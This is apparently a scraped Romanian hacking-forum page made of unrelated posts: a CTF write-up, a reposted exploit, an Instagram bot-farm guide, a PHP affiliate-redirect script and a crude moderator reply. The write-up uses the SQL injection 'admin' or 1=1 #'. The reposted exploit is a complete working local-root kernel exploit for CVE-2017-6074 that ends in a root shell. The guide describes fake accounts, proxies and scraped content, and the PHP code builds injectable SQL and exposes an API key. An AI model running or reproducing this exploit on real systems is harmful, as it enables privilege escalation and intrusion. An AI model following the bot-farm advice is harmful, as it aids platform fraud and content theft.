Leaderboard

Am rezolvat si eu acest challenge si parerea mea e ca nu este HARD, si nici macar tehnic. Ai nevoie de putina intuitie... Am descarcat arhiva, am dezarhivat executabilul si am modificat extensia in .exe apoi l-am urcat pe http://hybrid-analysis.com: LINK Usr6 mi-a zis dinainte ca challenge-ul contine un nivel cu SQLI. Asa ca m-am gandit ca malware-ul se conecteaza undeva si trimite informatii despre utilizatorul infectat care mai apoi vor fi tinute intr-o baza de date. Ciudat, am vazut ca nu se conecteaza nicaieri... Deci, cum trimite el datele? M-am uitat mai atent si am vazut la strings acest link: http://stlr.multiencoder.com/admin.php . Am intrat imediat sa vad care-i treaba si , ca sa vezi, un panel de la un stealer..: Deci aici ar trebui sa fie SQLI-ul? Am incercat metoda clasica: La username am introdus admin' or 1=1 # . A mers, acum... na beleaua, vad o poza si niste numere pe ea: L-am intrebat pe Usr6 ce ar trebui sa fac si imi zice sa deschid poza full screen , sa ma dau mai in spate cu vreo 2-3 metri si sa ma mai uit o data. Da, seamana foarte mult cu tabelul periodic al elementelor chimice. M-am apucat sa traduc numerele alea dupa tabel si mi-a dat PSSW IS LiBeLuLa.. Si unde bag eu parola asta? M-am gandit imediat la challenge-urile trecute in care punea arhive in poze. Am descarcat poza cu cifrele si i-am schimbat extensia in .7z. Am deschis-o si mi-a cerut parola. Am pus parola LiBeLuLa si a mers. Ce gasesc acolo? O poza cu Gecko:

Aveti aici pdf-ul. Sursa: exploit-db.com.

// // EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471 // // A proof-of-concept local root exploit for CVE-2017-6074. // Includes a semireliable SMAP/SMEP bypass. // Tested on 4.4.0-62-generic #83-Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074 // // Usage: // $ gcc poc.c -o pwn // $ ./pwn // [.] namespace sandbox setup successfully // [.] disabling SMEP & SMAP // [.] scheduling 0xffffffff81064550(0x406e0) // [.] waiting for the timer to execute // [.] done // [.] SMEP & SMAP should be off now // [.] getting root // [.] executing 0x402043 // [.] done // [.] should be root now // [.] checking if we got root // [+] got r00t ^_^ // [!] don't kill the exploit binary, the kernel will crash // # cat /etc/shadow // ... // daemon:*:17149:0:99999:7::: // bin:*:17149:0:99999:7::: // sys:*:17149:0:99999:7::: // sync:*:17149:0:99999:7::: // games:*:17149:0:99999:7::: // ... // // Andrey Konovalov <andreyknvl@gmail.com> #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <stdarg.h> #include <stdbool.h> #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sched.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <arpa/inet.h> #include <linux/if_packet.h> #include <netinet/if_ether.h> #define SMEP_SMAP_BYPASS 1 // Needed for local root. #define COMMIT_CREDS 0xffffffff810a2840L #define PREPARE_KERNEL_CRED 0xffffffff810a2c30L #define SHINFO_OFFSET 1728 // Needed for SMEP_SMAP_BYPASS. #define NATIVE_WRITE_CR4 0xffffffff81064550ul #define CR4_DESIRED_VALUE 0x406e0ul #define TIMER_OFFSET (728 + 48 + 104) #define KMALLOC_PAD 128 #define KMALLOC_WARM 32 #define CATCH_FIRST 6 #define CATCH_AGAIN 16 #define CATCH_AGAIN_SMALL 64 // Port is incremented on each use. static int port = 11000; void debug(const char *msg) { /* char buffer[32]; snprintf(&buffer[0], sizeof(buffer), "echo '%s' > /dev/kmsg\n", msg); system(buffer); */ } // * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * struct ubuf_info { uint64_t callback; // void (*callback)(struct ubuf_info *, bool) uint64_t ctx; // void * uint64_t desc; // unsigned long }; struct skb_shared_info { uint8_t nr_frags; // unsigned char uint8_t tx_flags; // __u8 uint16_t gso_size; // unsigned short uint16_t gso_segs; // unsigned short uint16_t gso_type; // unsigned short uint64_t frag_list; // struct sk_buff * uint64_t hwtstamps; // struct skb_shared_hwtstamps uint32_t tskey; // u32 uint32_t ip6_frag_id; // __be32 uint32_t dataref; // atomic_t uint64_t destructor_arg; // void * uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS]; }; struct ubuf_info ui; void init_skb_buffer(char* buffer, void *func) { memset(&buffer[0], 0, 2048); struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET]; ssi->tx_flags = 0xff; ssi->destructor_arg = (uint64_t)&ui; ssi->nr_frags = 0; ssi->frag_list = 0; ui.callback = (unsigned long)func; } struct timer_list { void *next; void *prev; unsigned long expires; void (*function)(unsigned long); unsigned long data; unsigned int flags; int slack; }; void init_timer_buffer(char* buffer, void *func, unsigned long arg) { memset(&buffer[0], 0, 2048); struct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET]; timer->next = 0; timer->prev = 0; timer->expires = 4294943360; timer->function = func; timer->data = arg; timer->flags = 1; timer->slack = -1; } // * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * struct dccp_handle { struct sockaddr_in6 sa; int s1; int s2; }; void dccp_init(struct dccp_handle *handle, int port) { handle->sa.sin6_family = AF_INET6; handle->sa.sin6_port = htons(port); inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr); handle->sa.sin6_flowinfo = 0; handle->sa.sin6_scope_id = 0; handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); if (handle->s1 == -1) { perror("socket(SOCK_DCCP)"); exit(EXIT_FAILURE); } int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa)); if (rv != 0) { perror("bind()"); exit(EXIT_FAILURE); } rv = listen(handle->s1, 0x9); if (rv != 0) { perror("listen()"); exit(EXIT_FAILURE); } int optval = 8; rv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, sizeof(optval)); if (rv != 0) { perror("setsockopt(IPV6_RECVPKTINFO)"); exit(EXIT_FAILURE); } handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); if (handle->s1 == -1) { perror("socket(SOCK_DCCP)"); exit(EXIT_FAILURE); } } void dccp_kmalloc_kfree(struct dccp_handle *handle) { int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa)); if (rv != 0) { perror("connect(SOCK_DCCP)"); exit(EXIT_FAILURE); } } void dccp_kfree_again(struct dccp_handle *handle) { int rv = shutdown(handle->s1, SHUT_RDWR); if (rv != 0) { perror("shutdown(SOCK_DCCP)"); exit(EXIT_FAILURE); } } void dccp_destroy(struct dccp_handle *handle) { close(handle->s1); close(handle->s2); } // * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * * struct udp_fifo_handle { int fds[2]; }; void udp_fifo_init(struct udp_fifo_handle* handle) { int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds); if (rv != 0) { perror("socketpair()"); exit(EXIT_FAILURE); } } void udp_fifo_destroy(struct udp_fifo_handle* handle) { close(handle->fds[0]); close(handle->fds[1]); } void udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) { int rv = send(handle->fds[0], buffer, 1536, 0); if (rv != 1536) { perror("send()"); exit(EXIT_FAILURE); } } void udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) { char buffer[128]; int rv = send(handle->fds[0], &buffer[0], 128, 0); if (rv != 128) { perror("send()"); exit(EXIT_FAILURE); } } void udp_fifo_kfree(struct udp_fifo_handle* handle) { char buffer[2048]; int rv = recv(handle->fds[1], &buffer[0], 1536, 0); if (rv != 1536) { perror("recv()"); exit(EXIT_FAILURE); } } int timer_kmalloc() { int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); if (s == -1) { perror("socket(SOCK_DGRAM)"); exit(EXIT_FAILURE); } return s; } #define CONF_RING_FRAMES 1 void timer_schedule(int handle, int timeout) { int optval = TPACKET_V3; int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION, &optval, sizeof(optval)); if (rv != 0) { perror("setsockopt(PACKET_VERSION)"); exit(EXIT_FAILURE); } struct tpacket_req3 tp; memset(&tp, 0, sizeof(tp)); tp.tp_block_size = CONF_RING_FRAMES * getpagesize(); tp.tp_block_nr = 1; tp.tp_frame_size = getpagesize(); tp.tp_frame_nr = CONF_RING_FRAMES; tp.tp_retire_blk_tov = timeout; rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING, (void *)&tp, sizeof(tp)); if (rv != 0) { perror("setsockopt(PACKET_RX_RING)"); exit(EXIT_FAILURE); } } void socket_sendmmsg(int sock, char *buffer) { struct mmsghdr msg[1]; msg[0].msg_hdr.msg_iovlen = 0; // Buffer to kmalloc. msg[0].msg_hdr.msg_control = &buffer[0]; msg[0].msg_hdr.msg_controllen = 2048; // Make sendmmsg exit easy with EINVAL. msg[0].msg_hdr.msg_name = "root"; msg[0].msg_hdr.msg_namelen = 1; int rv = syscall(__NR_sendmmsg, sock, msg, 1, 0); if (rv == -1 && errno != EINVAL) { perror("[-] sendmmsg()"); exit(EXIT_FAILURE); } } void sendmmsg_kmalloc_kfree(int port, char *buffer) { int sock[2]; int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock); if (rv != 0) { perror("socketpair()"); exit(EXIT_FAILURE); } socket_sendmmsg(sock[0], buffer); close(sock[0]); } // * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * * void dccp_connect_pad(struct dccp_handle *handle, int port) { handle->sa.sin6_family = AF_INET6; handle->sa.sin6_port = htons(port); inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr); handle->sa.sin6_flowinfo = 0; handle->sa.sin6_scope_id = 0; handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); if (handle->s1 == -1) { perror("socket(SOCK_DCCP)"); exit(EXIT_FAILURE); } int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa)); if (rv != 0) { perror("bind()"); exit(EXIT_FAILURE); } rv = listen(handle->s1, 0x9); if (rv != 0) { perror("listen()"); exit(EXIT_FAILURE); } handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP); if (handle->s1 == -1) { perror("socket(SOCK_DCCP)"); exit(EXIT_FAILURE); } rv = connect(handle->s2, &handle->sa, sizeof(handle->sa)); if (rv != 0) { perror("connect(SOCK_DCCP)"); exit(EXIT_FAILURE); } } void dccp_kmalloc_pad() { int i; struct dccp_handle handle; for (i = 0; i < 4; i++) { dccp_connect_pad(&handle, port++); } } void timer_kmalloc_pad() { int i; for (i = 0; i < 4; i++) { socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); } } void udp_kmalloc_pad() { int i, j; char dummy[2048]; struct udp_fifo_handle uh[16]; for (i = 0; i < KMALLOC_PAD / 16; i++) { udp_fifo_init(&uh[i]); for (j = 0; j < 16; j++) udp_fifo_kmalloc(&uh[i], &dummy[0]); } } void kmalloc_pad() { debug("dccp kmalloc pad"); dccp_kmalloc_pad(); debug("timer kmalloc pad"); timer_kmalloc_pad(); debug("udp kmalloc pad"); udp_kmalloc_pad(); } void udp_kmalloc_warm() { int i, j; char dummy[2048]; struct udp_fifo_handle uh[16]; for (i = 0; i < KMALLOC_WARM / 16; i++) { udp_fifo_init(&uh[i]); for (j = 0; j < 16; j++) udp_fifo_kmalloc(&uh[i], &dummy[0]); } for (i = 0; i < KMALLOC_WARM / 16; i++) { for (j = 0; j < 16; j++) udp_fifo_kfree(&uh[i]); } } void kmalloc_warm() { udp_kmalloc_warm(); } // * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * * // Executes func(arg) from interrupt context multiple times. void kernel_exec_irq(void *func, unsigned long arg) { int i; struct dccp_handle dh; struct udp_fifo_handle uh1, uh2, uh3, uh4; char dummy[2048]; char buffer[2048]; printf("[.] scheduling %p(%p)\n", func, (void *)arg); memset(&dummy[0], 0xc3, 2048); init_timer_buffer(&buffer[0], func, arg); udp_fifo_init(&uh1); udp_fifo_init(&uh2); udp_fifo_init(&uh3); udp_fifo_init(&uh4); debug("kmalloc pad"); kmalloc_pad(); debug("kmalloc warm"); kmalloc_warm(); debug("dccp init"); dccp_init(&dh, port++); debug("dccp kmalloc kfree"); dccp_kmalloc_kfree(&dh); debug("catch 1"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kmalloc(&uh1, &dummy[0]); debug("dccp kfree again"); dccp_kfree_again(&dh); debug("catch 2"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kmalloc(&uh2, &dummy[0]); int timers[CATCH_FIRST]; debug("catch 1 -> timer"); for (i = 0; i < CATCH_FIRST; i++) { udp_fifo_kfree(&uh1); timers[i] = timer_kmalloc(); } debug("catch 1 small"); for (i = 0; i < CATCH_AGAIN_SMALL; i++) udp_fifo_kmalloc_small(&uh4); debug("schedule timers"); for (i = 0; i < CATCH_FIRST; i++) timer_schedule(timers[i], 500); debug("catch 2 -> overwrite timers"); for (i = 0; i < CATCH_FIRST; i++) { udp_fifo_kfree(&uh2); udp_fifo_kmalloc(&uh3, &buffer[0]); } debug("catch 2 small"); for (i = 0; i < CATCH_AGAIN_SMALL; i++) udp_fifo_kmalloc_small(&uh4); printf("[.] waiting for the timer to execute\n"); debug("wait"); sleep(1); printf("[.] done\n"); } void disable_smep_smap() { printf("[.] disabling SMEP & SMAP\n"); kernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE); printf("[.] SMEP & SMAP should be off now\n"); } // * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * * // Executes func() from process context. void kernel_exec(void *func) { int i; struct dccp_handle dh; struct udp_fifo_handle uh1, uh2, uh3; char dummy[2048]; char buffer[2048]; printf("[.] executing %p\n", func); memset(&dummy[0], 0, 2048); init_skb_buffer(&buffer[0], func); udp_fifo_init(&uh1); udp_fifo_init(&uh2); udp_fifo_init(&uh3); debug("kmalloc pad"); kmalloc_pad(); debug("kmalloc warm"); kmalloc_warm(); debug("dccp init"); dccp_init(&dh, port++); debug("dccp kmalloc kfree"); dccp_kmalloc_kfree(&dh); debug("catch 1"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kmalloc(&uh1, &dummy[0]); debug("dccp kfree again:"); dccp_kfree_again(&dh); debug("catch 2"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kmalloc(&uh2, &dummy[0]); debug("catch 1 -> overwrite"); for (i = 0; i < CATCH_FIRST; i++) { udp_fifo_kfree(&uh1); sendmmsg_kmalloc_kfree(port++, &buffer[0]); } debug("catch 2 -> free & trigger"); for (i = 0; i < CATCH_FIRST; i++) udp_fifo_kfree(&uh2); debug("catch 1 & 2"); for (i = 0; i < CATCH_AGAIN; i++) udp_fifo_kmalloc(&uh3, &dummy[0]); printf("[.] done\n"); } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; void get_root_payload(void) { commit_creds(prepare_kernel_cred(0)); } void get_root() { printf("[.] getting root\n"); kernel_exec(&get_root_payload); printf("[.] should be root now\n"); } // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * void exec_shell() { char *shell = "/bin/bash"; char *args[] = {shell, "-i", NULL}; execve(shell, args, NULL); } void fork_shell() { pid_t rv; rv = fork(); if (rv == -1) { perror("fork()"); exit(EXIT_FAILURE); } if (rv == 0) { exec_shell(); } } bool is_root() { // We can't simple check uid, since we're running inside a namespace // with uid set to 0. Try opening /etc/shadow instead. int fd = open("/etc/shadow", O_RDONLY); if (fd == -1) return false; close(fd); return true; } void check_root() { printf("[.] checking if we got root\n"); if (!is_root()) { printf("[-] something went wrong =(\n"); printf("[!] don't kill the exploit binary, the kernel will crash\n"); return; } printf("[+] got r00t ^_^\n"); printf("[!] don't kill the exploit binary, the kernel will crash\n"); // Fork and exec instead of just doing the exec to avoid freeing // skbuffs and prevent crashes due to a allocator corruption. fork_shell(); } static bool write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { close(fd); return false; } close(fd); return true; } void setup_sandbox() { int real_uid = getuid(); int real_gid = getgid(); if (unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); } if (unshare(CLONE_NEWNET) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); } if (!write_file("/proc/self/setgroups", "deny")) { perror("write_file(/proc/self/set_groups)"); exit(EXIT_FAILURE); } if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){ perror("write_file(/proc/self/uid_map)"); exit(EXIT_FAILURE); } if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) { perror("write_file(/proc/self/gid_map)"); exit(EXIT_FAILURE); } cpu_set_t my_set; CPU_ZERO(&my_set); CPU_SET(0, &my_set); if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { perror("sched_setaffinity()"); exit(EXIT_FAILURE); } if (system("/sbin/ifconfig lo up") != 0) { perror("system(/sbin/ifconfig lo up)"); exit(EXIT_FAILURE); } printf("[.] namespace sandbox setup successfully\n"); } int main() { setup_sandbox(); #if SMEP_SMAP_BYPASS disable_smep_smap(); #endif get_root(); check_root(); while (true) { sleep(100); } return 0; } Sursa: https://www.exploit-db.com/exploits/41458/

Am decis sa fac un tutorial pentru ca vad ca inca multi se zbat si nu gasesc cum sa faca un venit mic spre mediu din online,traind in Romania. Poate ca pentru unii dintre voi sumele de care voi vorbi vi se vor parea infime insa pe altii sigur ii vor ajuta. Pentru mine a fost ca un challenge avand in vedere ca am renuntat dupa multi ani in care toate veniturile imi veneau din online ; drept urmare nu pot sta departe de online tot timpul,asa ca m-am decis cu cateva luni in urma sa caut ceva din care prin care sa imi cumpar tigarile ( in Londra, 7 pounds pachetul x 30 de zile ) Nu am luat-o ca pe o "joaca" ci ca pe un lucru serios, deci target-ul era 200 de pounds estimativ pe luna,pasiv pe semi-autopilot ; am citit tone de balarii si nimic concret ; pana am descoperit trucul asta ; o sa scriu pe scurt ca am povestit destul moartea caprioarei Partea interesanta incepe de aici in jos 1. Conturi instagram bineinteles 2. Proxy-uri private 3. O nisa ; aici cerul e limita. 4. hashtag-uri ; aici analizezi destul de bine majoritatea hastagurilor si le asezi atent , ele iti aduc pasiv falloweri si like-uri . Explicatii . 1. Conturile de instagram le puteti lua in bulk PVA insa eu am preferat sa le fac manual,majoritatea sunt cu proxy-uri ciudate semi-dedicate,spamate in multe cazuri de mai multe ori. Plus de asta ma gandesc ca algoritmii celor de la instagram nu sunt atat de slabi incat sa nu realizeze ca Vasile are mail de .ru , numar de USA si se logheaza din Germania ( dau un exemplu ) si unde mai pui ca dupa isi schimba si username-ul si numele si bio ... si incepe sa spameze. 2. Proxy-uri private eu am ales, un cont , un proxy . Puteti incerca si semi-dedicate insa pot fi folosite si de altii si e pacat de munca voastra. 3. Nisa e alegerea voastra,eu am ales o nisa medie spre mica ; aici nu va pot da sfaturi ca nu sunt capabil ; posibil nisa mea sa fie de cacat si eu sa ma cred zeu . Insa bineinteles nu o nisa "interzisa" 4. Hashtag-urile le analizez odata pe saptamana de preferat in week-end cand ma plictisesc, ma uit la concurenta si la gigantii din nisa mea, vad catre ce pointeaza si au mai mare impact. Personal folosesc descriere 4-10 cuvinte + smiley + 5-10 hastaguri . Automatizarea 1. Mass planer sau fallowliker ( Prefer mass planer pentru ca e cu plata lunara si ca adminii sunt romani ) 2. Sa zicem ca ai facut 20 de conturi si cumperi si 20 de proxy-uri private. 3. Asezi punctul 2 in punctul 1 ( Conturile in Mass planer ) 4. Stai ca tristul si pui descriere poze de profil, bio , username, 6 posturi de start pentru fiecare. ( E un calvar,credeti-ma ) 5. Daca nu ai cedat la pasul 4, lasi o zi,doua conturile sa se "linisteasca" nu le atingi. 6. Incepi sa setezi un numar mic de falloweri in 6 zile ale saptamanii, eu am inceput cu 34-50 maxim pe zi cu Night mode activ ( gen cand dormi; sa mimeze omul ) 6.1 Nu am setat sa dea like,nici comentarii,nici mesaje private in primele 14 zile. 6.2 Dupa 14 zile am crescut numarul de falloweri la 200-250 pe zi timp de 6 zile, like aleatoriu si unfallow doar intr-o zi. Asta a fost alegerea mea,fiecare cu parerea lui. 7. Cauti 4K Stogram ( acest soft iti trage tot contentul dupa 2 profile in varianta free ; dar le poti sterge si adauga alte profile . 7.1 Dupa ce ai sortat pozele,caut un file renamer si editezi aleatoriu toate numele la poze ( sunt o gramada free ) 7.2 Am setat sa posteze aleatoriu 3-5 poze pe zi ( bineinteles tot cu night mode activ ) Banii din instagram se fac din diverse domenii : shoutcast-uri , repost-uri, ogads. dropshipping, referal catre site cu adsense/amazon bla bla ; nu asta e problema ; problema e sa ai cateva zeci de mii de falloweri pentru inceput sa ai " de unde raspunde " Investitii : mass planer instagram edition ; proxy-uri private . In jur de 150-200 de ron lunar,in functie de cate proxy-uri ai. Parti negative 1. Iti poti lua ban,oricand,chiar mass-ban ; am citit o poveste foarte trista a unuia caruia iau luat-o razna proxy-urile si si-a luat mass ban pe conturi mari. 2. Trebuiesc niste bani investiti 3. E posibil sa dai un mare fail 4.Ai nevoie de un VPS pe windows sau de un pc non-stop online . Nu prea as fi vrut sa mai scriu aici ca sunt multi copii care se umfla in piept iar baietii valabili sau cam desumflat si isi vad de drumul lor de cand a luat militia forumul la puricat. P.S. : N-am stat sa scriu elaborat,v-am vorbit ca la copiii mei,asa ca daca am greseli de exprimare nu ma pedepsiti. LE: Puteti face si si cu 2-3 conturi pe ip real de acasa , fara nici o investitie, cu imacros, va pot da eu scripturi pentru niste beri in schimb.

Felicitari! Si foarte util acel site https://www.hybrid-analysis.com/

Salut, acum 10 zile m-am gandit daca pot face un script care sa imi redirectioneze vizitatorii pe anumite linkuri in functie de tara de origine si daca este conectat de pe mobil sau desktop, am cautat putin pe internet si am ajuns la concluzia ca pot face asta destul de usor cu php si mysql, zis si facut : am facut cateva tutoriale de php si mysql(le-am prins repede, pentru ca am ceva experienta in programare din facultate), m-am apucat sa dezvolt scriptul cat mai repede pentru ca aveam nevoie de el si am ajuns la varianta intermediara, dar nu functioneaza foarte bine adica in jur de 30-40% din utilizatori se pierd pe drum. Acum sa explic putin functionalitatea gandita si implementata de mine, apoi voi posta codul si poate ma va ajuta cineva sa il fac sa mearga 100 % : 1. Se extrage ip-ul userului apoi se face un select query catre o baza de date interna formata din range-urile ip-urilor, baza de date este downloadata de aici : https://db-ip.com/db/#intro si se extrage codul tarii careia ii este asignat ip-ul, iar daca query-ul nu returneaza niciun rand se va returna 'NF' ca si country Code. 2. Se va verifica daca ip-ul este unic pe ziua respectiva si daca da se va scrie intr-un tabel(asta nu e este chiar relevant, este doar pentru a tine evidenta). 3. Se verifica daca userul este mobile sau desktop prin intermediul clasei oferita de google : http://mobiledetect.net/ 3. Cu codul tarii extras se va face o prioritizare in functie de tierul tarilor dupa cum urmeaza : United States, Marea Britanie, Australia, Canada, Noua Zeelanda si Africa de Sud sunt clasa ca Tier1, restul sunt clasate ca Tier2, iar daca codul este 'NF' se va clasa ca Lost pentru a tine evidenta daca va exista vreun query in baza de date a ip-urilor care nu va aduce rezultate. 4. Pentru statistici am implementat functia trackvisitors() care incrementeaza intr-un table de fiecare data cand un vizitator unic este pe site pe fiecare ora, dar si incrementeaza alte 3 valori pentru a vedea din ce tier face parte vizitatorul. 5. Si cea mai importanta functie : redirect(), care face un query in baza de date si extrage linkul pe care va fi redirectionat userul, in functie de Tierul din care face parte si browserul(mobile sau desktop), iar baza de date arata cam asa : http://prntscr.com/ee4kv2 , ce este scris la offerlink este irelevant, redirectul se face doar pe afflink. La indemnul cuiva am pus "die;" dupa header();, dar nu a avut nicio schimbare, in continuare pierd undeva in jur de 30-40% de utilizatori, pentru ca daca fac redirect domeniului din cpanel spre un singur link care este contorizat de aceeasi firma care contorizeaza si restul linkurilor, numarul este normal, dar cand rulez scriptul acesta scade dramatic, chiar acum 2 zile am instalat LAMP stack pe un vps pentru a hosta scriptul acolo, dar rezultatul este acelasi, am urmarit si fisierul de apache2 errors, dar nu a a inregistrat mai nimic, mai exact asa : tail -f /var/log/apache2/error.log, ba chiar am stat si cu top deschis vreo 10 minute pentru a monitoriza load averageul iar acesta sta in 0.01 - 0.02 constant. Codul sursa: <?php include ("Mobile_Detect.php"); ob_start(); $ip=$_SERVER['REMOTE_ADDR']; date_default_timezone_set("America/New_York"); $date = date("Y-m-d"); $hour = date("G"); $servername = "127.0.0.1"; $username = "root"; $password = "******"; $dbname = "trackingscript"; $detect = new Mobile_Detect(); if ($detect->isMobile()) $browser = "Mobile"; else $browser = "Desktop"; $mysqli = new mysqli($servername, $username, $password, $dbname); $countryCode = getCountry(); $unique = checkuniqueip($ip); $getTier = getCountryTier(); $CountryTier = $getTier['countryTier']; trackvisitors(); redirect(); function shorturl($lurl){ $curl = curl_init(); $post_data = array('format' => 'json', 'apikey' => '3B77EIBEGAD90FB7A806', 'provider' => 'bit_ly', 'url' => $lurl ); $api_url = 'http://tiny-url.info/api/v1/create'; curl_setopt($curl, CURLOPT_URL, $api_url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data); $url = curl_exec($curl); curl_close($curl); $url1 = json_decode($url); return $url1->shorturl; } function getCountry(){ global $mysqli; global $ip; $connect = $mysqli->query("SELECT Country FROM iptables WHERE INET_ATON('$ip') >= INET_ATON(MinRange) AND INET_ATON('$ip') <= INET_ATON(MaxRange)"); if($connect->num_rows == 0){ $countryCode = 'NF'; }else{ while($row = $connect->fetch_assoc()){ $countryCode = $row['Country']; } } return $countryCode; } function checkuniqueip($ip){ global $countryCode; global $browser; global $date; global $hour; global $mysqli; $checkip = $mysqli->query("SELECT IP FROM UniqueIp WHERE IP = '$ip' AND DATE = '$date' AND BROWSER = '$browser'"); if($checkip->num_rows == 0){ $sql = $mysqli->query("INSERT INTO UniqueIp(DATE, HOUR, IP, COUNTRY, BROWSER) VALUES('$date','$hour','$ip','$countryCode','$browser')"); #echo $mysqli->error; return 1; }else{ return 0; } } function getCountryTier(){ global $date; global $hour; $country = getCountry(); if ($country == 'US' || $country == 'GB' || $country == 'AU' || $country == 'CA' || $country == 'ZA' || $country == 'NZ'){ $countryTier = 'Tier1'; $sqlstatementinsert = "INSERT INTO trackingTable(DATE,HOUR, TotalVisitors, Tier1, Tier2, Lost) VALUES ('$date','$hour',1,1,0,0)"; $sqlstatementupdate = "UPDATE trackingTable SET TotalVisitors = TotalVisitors + 1, Tier1 = Tier1 + 1 WHERE DATE = '$date' AND HOUR ='$hour'"; }else if($country == 'NF'){ $countryTier = 'Lost'; $sqlstatementinsert = "INSERT INTO trackingTable(DATE,HOUR, TotalVisitors, Tier1, Tier2, Lost) VALUES ('$date','$hour',1,0,0,1)"; $sqlstatementupdate = "UPDATE trackingTable SET TotalVisitors = TotalVisitors + 1, Lost = Lost + 1 WHERE DATE = '$date' AND HOUR ='$hour'"; }else{ $countryTier = 'Tier2'; $sqlstatementinsert = "INSERT INTO trackingTable(DATE,HOUR, TotalVisitors, Tier1, Tier2, Lost) VALUES ('$date','$hour',1,0,1,0)"; $sqlstatementupdate = "UPDATE trackingTable SET TotalVisitors = TotalVisitors + 1, Tier2 = Tier2 + 1 WHERE DATE = '$date' AND HOUR ='$hour'"; } return array('countryTier' => $countryTier, 'sqlInsert' => $sqlstatementinsert, 'sqlUpdate' => $sqlstatementupdate); } function trackvisitors(){ global $date; global $hour; global $mysqli; global $ip; $countryTier = getCountryTier(); $checkdate = $mysqli->query("SELECT TotalVisitors FROM trackingTable WHERE DATE = '$date' AND HOUR = '$hour'"); if($checkdate->num_rows == 0){ $sql = $mysqli->query($countryTier['sqlInsert']); }else{ global $unique; if($unique == 1){ $sql = $mysqli->query($countryTier['sqlUpdate']); } } } function redirect(){ global $browser; global $hour; global $ip; global $date; global $mysqli; global $CountryTier; $redirectTo = $mysqli->query("SELECT OFFERLINK, AFFLINK FROM Links1 WHERE Tier = '$CountryTier' AND BROWSER = '$browser'"); while($row = $redirectTo->fetch_assoc()){ $result = $row['AFFLINK']; $result1 = $row['OFFERLINK']; } $sql = $mysqli->query("UPDATE UniqueIp SET LINKREDIRECTED = '$result1' WHERE IP = '$ip' AND DATE = '$date' AND HOUR = '$hour' AND BROWSER = '$browser'"); $mysqli->close(); #$result1 = shorturl($result); header("Location: ".$result); die; } ?>

Salut, 1. Am dat pana in anul 2038 ca nu suporta platforma mai mult 2. Am zis o saptamana, dar sa fie acolo grupa mare, in caz ca uit 3. Am intrat pe chat, am salutat si mi-ai dat mesaj privat cu formula clasica de salut romaneasca "muie" 4. Nu ne tragem de sireturi, nu suntem prieteni. Si daca am fi prieteni, intai ne-am saluta respectuos apoi ne-am baga pulile-n gura. Cat a trecut ? 1-2 zile ? Mai ai 5. Nu, nu e abuz. Esti in casa la noi.

Okei, in sfarsit l-am rezolvat suntem aproximmativ 4 persoane care l-au rezolvat, o sa fac un write-up, si dupa ce se termina il public